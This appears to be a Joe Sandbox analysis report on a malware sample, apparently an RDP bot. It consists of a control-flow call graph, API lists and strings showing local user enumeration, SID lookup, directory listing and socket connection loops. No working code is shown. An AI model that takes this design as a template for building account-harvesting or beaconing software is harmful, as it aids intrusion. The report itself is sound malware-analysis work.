62317 7ff7aabd1d71 62317->62313 62318->62315 62322 7ff7aabd19e2 25 API calls 62318->62322 62323 7ff7aabd1b8d 62319->62323 62320->62317 62320->62323 62325 7ff7aabd1360 SetServiceStatus 62320->62325 62322->62318 62323->62302 62326 7ff7aabd1360 SetServiceStatus 62323->62326 62324->62305 62325->62304 62326->62302 62327->62310 62328->62312 62329->62316 62330 7ffb2276135a 62331 7ffb22761365 62330->62331 62332 7ffb2276146e 62331->62332 62333 7ffb2276138d Sleep 62331->62333 62337 7ffb22761e65 16 API calls 62331->62337 62339 7ffb22761442 Sleep 62331->62339 62341 7ffb2276142e memcpy 62331->62341 62342 7ffb227620fc socket 62331->62342 62377 7ffb227625aa 62331->62377 62388 7ffb22761290 62331->62388 62336 7ffb2276147b 62332->62336 62397 7ffb22761e65 16 API calls 62332->62397 62333->62331 62337->62331 62339->62331 62341->62331 62343 7ffb227622fb WSAGetLastError 62342->62343 62344 7ffb22762133 62342->62344 62345 7ffb22769dc2 12 API calls 62343->62345 62346 7ffb22762137 62344->62346 62347 7ffb22762155 62344->62347 62349 7ffb2276231f 62345->62349 62398 7ffb22761d99 62346->62398 62350 7ffb22761d99 14 API calls 62347->62350 62352 7ffb22762329 62349->62352 62353 7ffb2276216f 62349->62353 62354 7ffb22762153 62350->62354 62356 7ffb22769dc2 12 API calls 62352->62356 62357 7ffb22769dc2 12 API calls 62353->62357 62376 7ffb22762167 62354->62376 62411 7ffb22761eca setsockopt 62354->62411 62355 7ffb227621ae 62358 7ffb227621b3 htonl htons connect 62355->62358 62355->62376 62360 7ffb22762190 62356->62360 62357->62360 62363 7ffb227621f1 62358->62363 62364 7ffb2276220c WSAGetLastError 62358->62364 62360->62331 62365 7ffb22761d99 14 API calls 62363->62365 62366 7ffb227622ce WSAGetLastError 62364->62366 62367 7ffb2276221d 62364->62367 62369 7ffb227621fe 62365->62369 62368 7ffb22769dc2 12 API calls 62366->62368 62370 7ffb22762225 select 62367->62370 62367->62376 62368->62376 62369->62349 62369->62376 62371 7ffb227622b0 62370->62371 62372 7ffb22762286 62370->62372 62374 7ffb22769dc2 12 API calls 62371->62374 62372->62363 62373 7ffb2276228c WSAGetLastError 62372->62373 62375 7ffb22769dc2 12 API calls 62373->62375 62374->62376 62375->62376 62415 7ffb22761e65 16 API calls 62376->62415 62378 7ffb22762638 62377->62378 62379 7ffb227625c4 62377->62379 62380 7ffb22769dc2 12 API calls 62378->62380 62379->62378 62381 7ffb227625c9 recv 62379->62381 62382 7ffb227625e3 62380->62382 62383 7ffb227625df 62381->62383 62384 7ffb227625ec WSAGetLastError 62381->62384 62382->62331 62383->62382 62387 7ffb22769dc2 12 API calls 62383->62387 62384->62382 62385 7ffb22762600 62384->62385 62386 7ffb22769dc2 12 API calls 62385->62386 62386->62382 62387->62382 62389 7ffb22761352 62388->62389 62390 7ffb227612a8 62388->62390 62389->62331 62390->62389 62416 7ffb22768e15 62390->62416 62393 7ffb22761344 LeaveCriticalSection 62393->62389 62394 7ffb227612d8 62394->62393 62395 7ffb22769dc2 12 API calls 62394->62395 62419 7ffb22769d36 62394->62419 62395->62394 62397->62336 62399 7ffb22761da9 ioctlsocket 62398->62399 62401 7ffb22761dcc 62399->62401 62402 7ffb22761ddd WSAGetLastError 62399->62402 62401->62355 62404 7ffb22761ce4 setsockopt 62401->62404 62403 7ffb22769dc2 12 API calls 62402->62403 62403->62401 62405 7ffb22761d19 setsockopt 62404->62405 62406 7ffb22761d74 WSAGetLastError 62404->62406 62408 7ffb22761d4f WSAGetLastError 62405->62408 62409 7ffb22761d45 62405->62409 62407 7ffb22769dc2 12 API calls 62406->62407 62407->62409 62410 7ffb22769dc2 12 API calls 62408->62410 62409->62354 62410->62409 62412 7ffb22761f11 WSAGetLastError 62411->62412 62413 7ffb22761f07 62411->62413 62414 7ffb22769dc2 12 API calls 62412->62414 62413->62355 62414->62413 62415->62353 62417 7ffb227612bb EnterCriticalSection 62416->62417 62418 7ffb22768e2b GetSystemTimeAsFileTime 62416->62418 62417->62394 62418->62417 62420 7ffb22769d62 62419->62420 62421 7ffb22769d81 62419->62421 62422 7ffb22769d9f 62420->62422 62423 7ffb22769d6c 62420->62423 62421->62394 62438 7ffb227699b3 29 API calls 62422->62438 62425 7ffb22769d6e 62423->62425 62426 7ffb22769d8a 62423->62426 62427 7ffb22769d98 62425->62427 62428 7ffb22769d75 62425->62428 62426->62421 62433 7ffb22769752 62426->62433 62437 7ffb22769760 31 API calls 62427->62437 62428->62421 62436 7ffb22769add 51 API calls 62428->62436 62431 7ffb22769d9d 62431->62421 62439 7ffb22769510 62433->62439 62436->62421 62437->62431 62438->62421 62468 7ffb22763f5b 62439->62468 62442 7ffb22769537 62442->62421 62443 7ffb22764ac0 14 API calls 62444 7ffb22769586 62443->62444 62445 7ffb227689db 14 API calls 62444->62445 62446 7ffb22769598 62445->62446 62447 7ffb227695a2 strlen 62446->62447 62465 7ffb22769699 62446->62465 62448 7ffb227695cf strlen 62447->62448 62449 7ffb227695b9 62447->62449 62471 7ffb227682d7 62448->62471 62449->62448 62450 7ffb227695be strlen 62449->62450 62450->62448 62453 7ffb2276971b 62527 7ffb22765bd8 FindClose 62453->62527 62454 7ffb22769601 62454->62442 62458 7ffb22769609 strlen 62454->62458 62460 7ffb22769620 62458->62460 62461 7ffb22769636 strcpy strlen strlen strlen 62458->62461 62459 7ffb22769727 62459->62442 62463 7ffb22763f5b 2 API calls 62459->62463 62460->62461 62462 7ffb22769625 strlen 62460->62462 62461->62465 62462->62461 62463->62442 62465->62442 62465->62453 62499 7ffb22765bf3 62465->62499 62524 7ffb2276542f 44 API calls 62465->62524 62525 7ffb22764e60 26 API calls 62465->62525 62526 7ffb22764fe9 72 API calls 62465->62526 62469 7ffb22763f71 QueryPerformanceFrequency QueryPerformanceCounter 62468->62469 62470 7ffb22763f66 62468->62470 62469->62470 62470->62442 62470->62443 62472 7ffb227682e0 GetFileAttributesA 62471->62472 62473 7ffb227682f5 62471->62473 62475 7ffb22768325 GetLastError 62472->62475 62476 7ffb227682eb 62472->62476 62474 7ffb22769dc2 12 API calls 62473->62474 62474->62476 62475->62476 62476->62454 62477 7ffb22765e9e 62476->62477 62478 7ffb22765ebd strlen 62477->62478 62479 7ffb22765ef8 62477->62479 62480 7ffb22765ece 62478->62480 62496 7ffb22765ee9 62478->62496 62481 7ffb22769dc2 12 API calls 62479->62481 62482 7ffb22765ed7 CreateDirectoryA 62480->62482 62483 7ffb22765f76 strcpy strlen 62480->62483 62481->62496 62485 7ffb22765f30 GetLastError 62482->62485 62482->62496 62484 7ffb22765fae strlen 62483->62484 62493 7ffb22765f55 62483->62493 62484->62493 62489 7ffb22769dc2 12 API calls 62485->62489 62486 7ffb22765f9d strlen 62486->62484 62487 7ffb22766160 62490 7ffb22769dc2 12 API calls 62487->62490 62488 7ffb227660e9 62492 7ffb22769dc2 12 API calls 62488->62492 62489->62493 62491 7ffb22766112 62490->62491 62491->62454 62492->62491 62493->62483 62493->62484 62493->62486 62494 7ffb2276601a CreateDirectoryA 62493->62494 62493->62496 62495 7ffb22766031 GetLastError 62494->62495 62497 7ffb22765fc5 62494->62497 62495->62497 62496->62487 62496->62488 62497->62493 62498 7ffb22769dc2 12 API calls 62497->62498 62498->62497 62500 7ffb22765c13 62499->62500 62520 7ffb22765c59 62499->62520 62502 7ffb22765cb2 62500->62502 62503 7ffb22765c1c 62500->62503 62501 7ffb22769dc2 12 API calls 62522 7ffb22765ca3 62501->62522 62504 7ffb22769dc2 12 API calls 62502->62504 62505 7ffb22765cea 62503->62505 62506 7ffb22765c25 62503->62506 62504->62522 62507 7ffb22769dc2 12 API calls 62505->62507 62508 7ffb22765d22 FindFirstFileA 62506->62508 62509 7ffb22765c31 FindNextFileA 62506->62509 62507->62522 62510 7ffb22765d43 GetLastError 62508->62510 62511 7ffb22765d36 62508->62511 62512 7ffb22765d72 GetLastError 62509->62512 62513 7ffb22765c47 62509->62513 62514 7ffb22765d50 62510->62514 62517 7ffb22765d57 62510->62517 62516 7ffb22765c4c strcpy 62511->62516 62512->62514 62515 7ffb22765d9b 62512->62515 62513->62516 62519 7ffb22765d8d FindClose 62514->62519 62514->62520 62523 7ffb22765db8 62514->62523 62521 7ffb22769dc2 12 API calls 62515->62521 62516->62520 62518 7ffb22769dc2 12 API calls 62517->62518 62518->62514 62519->62520 62520->62501 62520->62522 62521->62514 62522->62465 62523->62465 62524->62465 62525->62465 62526->62465 62527->62459 62528 7ffb23b0c415 62535 7ffb23b0c422 62528->62535 62529 7ffb23b0c632 62530 7ffb23b0c443 Sleep 62530->62535 62532 7ffb23b0c4bf Sleep 62532->62535 62533 7ffb23b077a2 6 API calls 62533->62535 62534 7ffb23b0c592 memcpy 62534->62535 62535->62529 62535->62530 62535->62532 62535->62533 62535->62534 62537 7ffb23b0c3ac 8 API calls 62535->62537 62538 7ffb23b061a2 13 API calls 62535->62538 62537->62535 62538->62535 62539 7ffb2273a31a 62544 7ffb2273a325 62539->62544 62540 7ffb2273a42e 62541 7ffb2273a43b 62540->62541 62606 7ffb2273ad75 10 API calls 62540->62606 62543 7ffb2273a34d Sleep 62543->62544 62544->62540 62544->62543 62547 7ffb2273a402 Sleep 62544->62547 62548 7ffb2273ad75 10 API calls 62544->62548 62550 7ffb2273a3ee memcpy 62544->62550 62551 7ffb2273b00c socket 62544->62551 62586 7ffb2273b4ba 62544->62586 62597 7ffb2273a250 62544->62597 62547->62544 62548->62544 62550->62544 62552 7ffb2273b20b WSAGetLastError 62551->62552 62553 7ffb2273b043 62551->62553 62556 7ffb2273c852 6 API calls 62552->62556 62554 7ffb2273b065 62553->62554 62555 7ffb2273b047 62553->62555 62559 7ffb2273aca9 8 API calls 62554->62559 62607 7ffb2273aca9 62555->62607 62558 7ffb2273b22f 62556->62558 62561 7ffb2273b07f 62558->62561 62562 7ffb2273b239 62558->62562 62563 7ffb2273b063 62559->62563 62564 7ffb2273c852 6 API calls 62561->62564 62566 7ffb2273c852 6 API calls 62562->62566 62567 7ffb2273b077 62563->62567 62620 7ffb2273adda setsockopt 62563->62620 62568 7ffb2273b0a0 62564->62568 62565 7ffb2273b0be 62565->62567 62570 7ffb2273b0c3 htonl htons connect 62565->62570 62566->62568 62624 7ffb2273ad75 10 API calls 62567->62624 62568->62544 62573 7ffb2273b11c WSAGetLastError 62570->62573 62574 7ffb2273b101 62570->62574 62576 7ffb2273b1de WSAGetLastError 62573->62576 62577 7ffb2273b12d 62573->62577 62575 7ffb2273aca9 8 API calls 62574->62575 62579 7ffb2273b10e 62575->62579 62578 7ffb2273c852 6 API calls 62576->62578 62577->62567 62580 7ffb2273b135 select 62577->62580 62578->62567 62579->62558 62579->62567 62581 7ffb2273b1c0 62580->62581 62582 7ffb2273b196 62580->62582 62583 7ffb2273c852 6 API calls 62581->62583 62582->62574 62584 7ffb2273b19c WSAGetLastError 62582->62584 62583->62567 62585 7ffb2273c852 6 API calls 62584->62585 62585->62567 62587 7ffb2273b4d4 62586->62587 62588 7ffb2273b548 62586->62588 62587->62588 62590 7ffb2273b4d9 recv 62587->62590 62589 7ffb2273c852 6 API calls 62588->62589 62593 7ffb2273b4f3 62589->62593 62591 7ffb2273b4fc WSAGetLastError 62590->62591 62592 7ffb2273b4ef 62590->62592 62591->62593 62594 7ffb2273b510 62591->62594 62592->62593 62596 7ffb2273c852 6 API calls 62592->62596 62593->62544 62595 7ffb2273c852 6 API calls 62594->62595 62595->62593 62596->62593 62598 7ffb2273a312 62597->62598 62599 7ffb2273a268 62597->62599 62598->62544 62599->62598 62625 7ffb22739035 62599->62625 62602 7ffb2273a304 LeaveCriticalSection 62602->62598 62603 7ffb2273a298 62603->62602 62604 7ffb2273c852 6 API calls 62603->62604 62628 7ffb2273e417 62603->62628 62604->62603 62606->62541 62608 7ffb2273acb9 ioctlsocket 62607->62608 62610 7ffb2273aced WSAGetLastError 62608->62610 62611 7ffb2273acdc 62608->62611 62612 7ffb2273c852 6 API calls 62610->62612 62611->62565 62613 7ffb2273abf4 setsockopt 62611->62613 62612->62611 62614 7ffb2273ac84 WSAGetLastError 62613->62614 62615 7ffb2273ac29 setsockopt 62613->62615 62616 7ffb2273c852 6 API calls 62614->62616 62617 7ffb2273ac5f WSAGetLastError 62615->62617 62618 7ffb2273ac55 62615->62618 62616->62618 62619 7ffb2273c852 6 API calls 62617->62619 62618->62563 62619->62618 62621 7ffb2273ae21 WSAGetLastError 62620->62621 62622 7ffb2273ae17 62620->62622 62623 7ffb2273c852 6 API calls 62621->62623 62622->62565 62623->62622 62624->62561 62626 7ffb2273904b GetSystemTimeAsFileTime 62625->62626 62627 7ffb22739040 EnterCriticalSection 62625->62627 62626->62627 62627->62603 62629 7ffb2273e46f 62628->62629 62630 7ffb2273e447 62628->62630 62629->62603 62631 7ffb2273e451 62630->62631 62632 7ffb2273e4b7 62630->62632 62633 7ffb2273e48d 62631->62633 62634 7ffb2273e453 62631->62634 62659 7ffb2273dc4a 90 API calls 62632->62659 62636 7ffb2273e4be 62633->62636 62637 7ffb2273e494 62633->62637 62638 7ffb2273e4c5 62634->62638 62639 7ffb2273e45a 62634->62639 62660 7ffb2273dcbf 47 API calls 62636->62660 62642 7ffb2273e49b 62637->62642 62643 7ffb2273e4b0 62637->62643 62661 7ffb2273ddf1 24 API calls 62638->62661 62644 7ffb2273e45c 62639->62644 62645 7ffb2273e478 62639->62645 62642->62629 62658 7ffb2273db66 183 API calls 62642->62658 62653 7ffb2273db58 62643->62653 62646 7ffb2273e4cc 62644->62646 62647 7ffb2273e463 62644->62647 62645->62629 62657 7ffb2273df13 15 API calls 62645->62657 62662 7ffb2273de9a 18 API calls 62646->62662 62647->62629 62656 7ffb2273df93 34 API calls 62647->62656 62663 7ffb2273db10 62653->62663 62656->62629 62657->62629 62658->62629 62659->62629 62660->62629 62661->62629 62662->62629 62670 7ffb2273bceb 62663->62670 62668 7ffb2273bceb 2 API calls 62669 7ffb2273db31 62668->62669 62669->62629 62671 7ffb2273bd01 QueryPerformanceFrequency QueryPerformanceCounter 62670->62671 62672 7ffb2273bcf6 62670->62672 62671->62672 62672->62669 62673 7ffb22736f2b 62672->62673 62708 7ffb22736eed 62673->62708 62676 7ffb22736f41 62678 7ffb22736f4e 62676->62678 62717 7ffb22738b2c 22 API calls 62676->62717 62677 7ffb2273b930 8 API calls 62679 7ffb22736f69 62677->62679 62678->62668 62680 7ffb2273466b 8 API calls 62679->62680 62682 7ffb22736f7e 62680->62682 62683 7ffb2273702f 62682->62683 62684 7ffb22736f88 strlen 62682->62684 62683->62676 62685 7ffb22737037 strlen 62683->62685 62687 7ffb22736fbe strlen 62684->62687 62688 7ffb22736fa5 62684->62688 62689 7ffb2273704e 62685->62689 62690 7ffb22737064 strlen 62685->62690 62713 7ffb22733714 10 API calls 62687->62713 62688->62687 62693 7ffb22736faa strlen 62688->62693 62689->62690 62695 7ffb22737053 strlen 62689->62695 62715 7ffb22733714 10 API calls 62690->62715 62692 7ffb2273710a 62697 7ffb22737131 62692->62697 62718 7ffb22738b47 GetProcessHeap HeapFree GetProcessHeap HeapFree LeaveCriticalSection 62692->62718 62719 7ffb227381b3 7 API calls 62692->62719 62693->62687 62695->62690 62697->62692 62720 7ffb22738237 41 API calls 62697->62720 62721 7ffb22737e40 19 API calls 62697->62721 62698 7ffb22737004 62698->62676 62714 7ffb22734246 8 API calls 62698->62714 62699 7ffb227370a7 62701 7ffb227370b4 CompareFileTime 62699->62701 62707 7ffb227370ea 62699->62707 62701->62676 62703 7ffb227370cc 62701->62703 62716 7ffb22732c59 8 API calls 62703->62716 62704 7ffb2273702d 62704->62683 62707->62676 62722 7ffb22735dd0 62708->62722 62712 7ffb22736efa 62712->62676 62712->62677 62713->62698 62714->62704 62715->62699 62716->62707 62717->62692 62718->62692 62719->62692 62720->62697 62721->62697 62723 7ffb22735192 9 API calls 62722->62723 62724 7ffb22735e13 62723->62724 62725 7ffb22735e17 strlen 62724->62725 62729 7ffb22735e60 62724->62729 62726 7ffb22735e2d strcmp 62725->62726 62728 7ffb22735e6e 62726->62728 62726->62729 62736 7ffb22734246 8 API calls 62728->62736 62729->62712 62735 7ffb2273b25e 27 API calls 62729->62735 62731 7ffb22735e94 62731->62729 62732 7ffb22735ea6 62731->62732 62737 7ffb22733f67 8 API calls 62732->62737 62734 7ffb22735eb0 62734->62729 62735->62712 62736->62731 62737->62734

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 799 7ffb22706da3-7ffb22706db9 call 7ffb227040d2 802 7ffb2270722a-7ffb2270722e 799->802 803 7ffb22707234-7ffb22707252 GetProcessHeap HeapAlloc 802->803 804 7ffb22706dbe 802->804 805 7ffb22707258-7ffb2270726e call 7ffb227040d2 803->805 806 7ffb22706dc3-7ffb22706dc8 803->806 804->806 805->806 808 7ffb22706eb4-7ffb22706eb9 806->808 809 7ffb22706dce-7ffb22706dde LocalAlloc 806->809 811 7ffb22706de2-7ffb22706de7 808->811 809->811 812 7ffb227071a5 811->812 813 7ffb22706ded-7ffb22706e6b wcsncpy call 7ffb227093ef LookupAccountNameW 811->813 815 7ffb227071aa-7ffb227071b5 812->815 821 7ffb22706ebe-7ffb22706eca GetLastError 813->821 822 7ffb22706e6d-7ffb22706e6f 813->822 817 7ffb22707273 815->817 818 7ffb227071bb-7ffb227071bd 815->818 820 7ffb22707279-7ffb22707281 817->820 818->817 819 7ffb227071c3-7ffb22707224 wcslen GetProcessHeap HeapAlloc 818->819 819->799 819->802 823 7ffb22707288-7ffb22707298 820->823 824 7ffb22707283 NetApiBufferFree 820->824 827 7ffb22706ee1-7ffb22706ef9 LocalAlloc 821->827 828 7ffb22706ecc-7ffb22706edf call 7ffb227040d2 821->828 825 7ffb22706e75-7ffb22706e96 GetLastError call 7ffb227040d2 822->825 826 7ffb22707070-7ffb22707088 ConvertSidToStringSidA 822->826 832 7ffb227073c3-7ffb227073ca 823->832 833 7ffb2270729e-7ffb227072a0 823->833 824->823 854 7ffb227070e7-7ffb227070ed 825->854 855 7ffb22706e9c 825->855 830 7ffb2270708a-7ffb22707091 826->830 831 7ffb227070c1-7ffb227070e5 GetLastError call 7ffb227040d2 826->831 834 7ffb22707066 827->834 835 7ffb22706eff-7ffb22706f31 LookupAccountNameW 827->835 828->825 838 7ffb22707097-7ffb227070bc call 7ffb227040d2 830->838 839 7ffb2270716d-7ffb22707172 830->839 831->830 844 7ffb22707409-7ffb22707422 call 7ffb227040d2 832->844 845 7ffb227073cc-7ffb227073ce 832->845 833->832 840 7ffb227072a6-7ffb22707310 NetUserEnum 833->840 834->826 841 7ffb22706f33-7ffb22706f3c LocalFree 835->841 842 7ffb22706f41-7ffb22706f62 GetLastError call 7ffb227040d2 835->842 838->815 839->815 840->820 849 7ffb22707316-7ffb2270731c 840->849 841->822 870 7ffb22706f64 842->870 871 7ffb22706f7c-7ffb22706f82 842->871 866 7ffb22707424 844->866 867 7ffb22707443-7ffb22707449 844->867 852 7ffb2270751a-7ffb22707534 call 7ffb227040d2 845->852 853 7ffb227073d4-7ffb227073f1 call 7ffb22706c7f call 7ffb227040d2 845->853 849->820 858 7ffb22707322-7ffb22707356 GetProcessHeap HeapAlloc 849->858 876 7ffb227073f6-7ffb22707408 852->876 853->876 860 7ffb227070f3-7ffb227070f9 854->860 861 7ffb2270717b-7ffb22707180 854->861 864 7ffb22707166-7ffb2270716b 855->864 865 7ffb22706ea2-7ffb22706eaf 855->865 868 7ffb22706d83-7ffb22706d9e call 7ffb227040d2 858->868 869 7ffb2270735c-7ffb22707366 858->869 872 7ffb22707125-7ffb22707128 860->872 873 7ffb227070fb-7ffb22707101 860->873 861->815 864->815 865->841 877 7ffb2270742a-7ffb22707437 866->877 878 7ffb227074c8-7ffb227074cd 866->878 879 7ffb227074d2 867->879 880 7ffb2270744f 867->880 868->820 881 7ffb22707368-7ffb2270739b memcpy GetProcessHeap HeapFree 869->881 882 7ffb227073a1-7ffb227073be 869->882 883 7ffb22706f6a-7ffb22706f77 870->883 884 7ffb22707016-7ffb2270701b 870->884 885 7ffb2270702a-7ffb2270702f 871->885 886 7ffb22706f88-7ffb22706f8e 871->886 890 7ffb2270712a-7ffb2270712d 872->890 891 7ffb2270713b-7ffb22707141 872->891 887 7ffb22707197-7ffb2270719c 873->887 888 7ffb22707107-7ffb2270710d 873->888 877->867 878->853 912 7ffb227074dc-7ffb227074e1 879->912 897 7ffb22707451-7ffb22707457 880->897 898 7ffb2270747f-7ffb22707482 880->898 881->882 883->871 884->841 885->841 900 7ffb22706fc4-7ffb22706fca 886->900 901 7ffb22706f90-7ffb22706f93 886->901 887->815 902 7ffb22707113-7ffb22707119 888->902 903 7ffb2270719e-7ffb227071a3 888->903 893 7ffb22707182-7ffb22707187 890->893 894 7ffb2270712f-7ffb22707132 890->894 895 7ffb22707143-7ffb22707148 891->895 896 7ffb22707190-7ffb22707195 891->896 893->815 904 7ffb22707189-7ffb2270718e 894->904 905 7ffb22707134-7ffb22707139 894->905 895->815 896->815 908 7ffb227074fa-7ffb227074ff 897->908 909 7ffb2270745d-7ffb22707463 897->909 910 7ffb22707498-7ffb2270749e 898->910 911 7ffb22707484-7ffb22707487 898->911 906 7ffb22707052-7ffb22707057 900->906 907 7ffb22706fd0-7ffb22706fd6 900->907 913 7ffb22706f95-7ffb22706f98 901->913 914 7ffb22706fae-7ffb22706fb4 901->914 915 7ffb2270714a-7ffb2270714f 902->915 916 7ffb2270711b-7ffb22707120 902->916 903->815 904->815 905->815 906->841 919 7ffb2270705c-7ffb22707061 907->919 920 7ffb22706fdc-7ffb22706fe2 907->920 908->853 921 7ffb22707469-7ffb2270746f 909->921 922 7ffb22707504-7ffb22707509 909->922 924 7ffb227074f0 910->924 925 7ffb227074a0-7ffb227074a5 910->925 911->912 923 7ffb22707489-7ffb2270748c 911->923 912->853 926 7ffb22707034-7ffb22707039 913->926 927 7ffb22706f9e-7ffb22706fa1 913->927 917 7ffb22706fba-7ffb22706fbf 914->917 918 7ffb22707048-7ffb2270704d 914->918 915->815 916->815 917->841 918->841 919->841 928 7ffb22706fe4-7ffb22706fe9 920->928 929 7ffb22706fee-7ffb22706ff3 920->929 930 7ffb22707475-7ffb2270747a 921->930 931 7ffb2270750e-7ffb22707513 921->931 922->853 932 7ffb227074e6-7ffb227074eb 923->932 933 7ffb2270748e-7ffb22707493 923->933 924->908 925->853 926->841 934 7ffb22706fa7-7ffb22706fac 927->934 935 7ffb2270703e-7ffb22707043 927->935 928->841 929->841 930->853 931->853 932->853 933->853 934->841 935->841
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208390764.00007FFB22701000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFB22700000, based on PE: true
                                    • Associated: 0000001D.00000002.2208361583.00007FFB22700000.00000002.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208422394.00007FFB22714000.00000002.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208448902.00007FFB2271D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208474915.00007FFB22720000.00000004.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208502995.00007FFB22721000.00000008.00000001.01000000.00000010.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22700000_main.jbxd
                                    Similarity
                                    • API ID: AllocErrorLastLocal$AccountCriticalHeapLookupNameSection$CopyEnterFileFreeLeaveProcessfflushfwritewcsncpy
                                    • String ID: D$[D] (%s) -> User found(name=%s,s_sid=%s,acct_expires=%x,last_logon=%x)$[E] (%s) -> ConvertSidToStringSid failed(gle=%lu)$[E] (%s) -> LookupAccountNameW failed(gle=%lu)$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$sid_to_str$users_sync
                                    • API String ID: 3624467404-104752423
                                    • Opcode ID: f77c6fcf1061f4f146997536a93bdebe5b0009022fe2d2267c1482a4f8b7796d
                                    • Instruction ID: 84c31fd12badb862192710dbee6de7bbf1bf38d420e3b2df10f191e183746b16
                                    • Opcode Fuzzy Hash: f77c6fcf1061f4f146997536a93bdebe5b0009022fe2d2267c1482a4f8b7796d
                                    • Instruction Fuzzy Hash: 57F191A2A0C68282FB5A8B34EC503B963A1EF86744F144136D54DC77B8DEBCEE49C741
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208703505.00007FFB22761000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFB22760000, based on PE: true
                                    • Associated: 0000001D.00000002.2208680037.00007FFB22760000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208733335.00007FFB22773000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208757421.00007FFB2277C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208788193.00007FFB2277F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208811315.00007FFB22780000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22760000_main.jbxd
                                    Similarity
                                    • API ID: Find$ErrorFileLast$CloseFirstNextfflushfwritestrcpy
                                    • String ID: (name != NULL)$(path != NULL)$(resume_handle != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> FindFirstFileA failed(path=%s,gle=%lu)$[E] (%s) -> FindNextFileA failed(path=%s,gle=%lu)$fs_dir_list
                                    • API String ID: 4253334766-1535167640
                                    • Opcode ID: 4949fe7bc8a222cefbf3ead6bf23d32448817b897e803bddc4395f5859a246e4
                                    • Instruction ID: ca6aa27477e8789c38f7b6236143183bf550c739b53148537807e7d811fd1453
                                    • Opcode Fuzzy Hash: 4949fe7bc8a222cefbf3ead6bf23d32448817b897e803bddc4395f5859a246e4
                                    • Instruction Fuzzy Hash: CF6119B1E0D5D385FA225B75EE847B862506F0B758F840132DA5ECA2F0DEECED45A341
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2206844500.00007FF7AABD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7AABD0000, based on PE: true
                                    • Associated: 0000001D.00000002.2206820722.00007FF7AABD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206867245.00007FF7AABE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABE8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABEA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206941983.00007FF7AABEE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ff7aabd0000_main.jbxd
                                    Similarity
                                    • API ID: Find$ErrorFileLast$CloseFirstNext_mbscpyfflushfwrite
                                    • String ID: (name != NULL)$(path != NULL)$(resume_handle != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> FindFirstFileA failed(path=%s,gle=%lu)$[E] (%s) -> FindNextFileA failed(path=%s,gle=%lu)$fs_dir_list
                                    • API String ID: 1094913617-1535167640
                                    • Opcode ID: 995f115fb8ba395f81a05c9b835082c6746a5ca2570fbf6c25dc8641196da954
                                    • Instruction ID: 055043e2939a4c351b9fdb6675b5f177250560d68095fa9063eba4ca93ef672c
                                    • Opcode Fuzzy Hash: 995f115fb8ba395f81a05c9b835082c6746a5ca2570fbf6c25dc8641196da954
                                    • Instruction Fuzzy Hash: 3E614A21E0F683C9FA607B55E4403F8E254AF20395FD641B2D99E5B2F4DE2CA887C361
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208390764.00007FFB22701000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFB22700000, based on PE: true
                                    • Associated: 0000001D.00000002.2208361583.00007FFB22700000.00000002.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208422394.00007FFB22714000.00000002.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208448902.00007FFB2271D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208474915.00007FFB22720000.00000004.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208502995.00007FFB22721000.00000008.00000001.01000000.00000010.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22700000_main.jbxd
                                    Similarity
                                    • API ID: Heap$Free$Process$AllocBufferEnumLocalUsermemcpy
                                    • String ID: [E] (%s) -> Failed(err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[E] (%s) -> NetUserEnum failed(enum_err=%08lx)$[I] (%s) -> Done(sam_user_num=%u)$mem_alloc$users_sync
                                    • API String ID: 1987963910-3382179125
                                    • Opcode ID: 99cbaf113bc8b4c80a5db71fbd9b66ee8517c08e3d22a6d9195eee4f8278679b
                                    • Instruction ID: b43c35f8873d17290d98659be593122c030b351737c3432112bf464805dab793
                                    • Opcode Fuzzy Hash: 99cbaf113bc8b4c80a5db71fbd9b66ee8517c08e3d22a6d9195eee4f8278679b
                                    • Instruction Fuzzy Hash: 54617FA1A0D6C681FA269B74EC803B96650AF86354F140035E94DC76B4EEFDEE898701
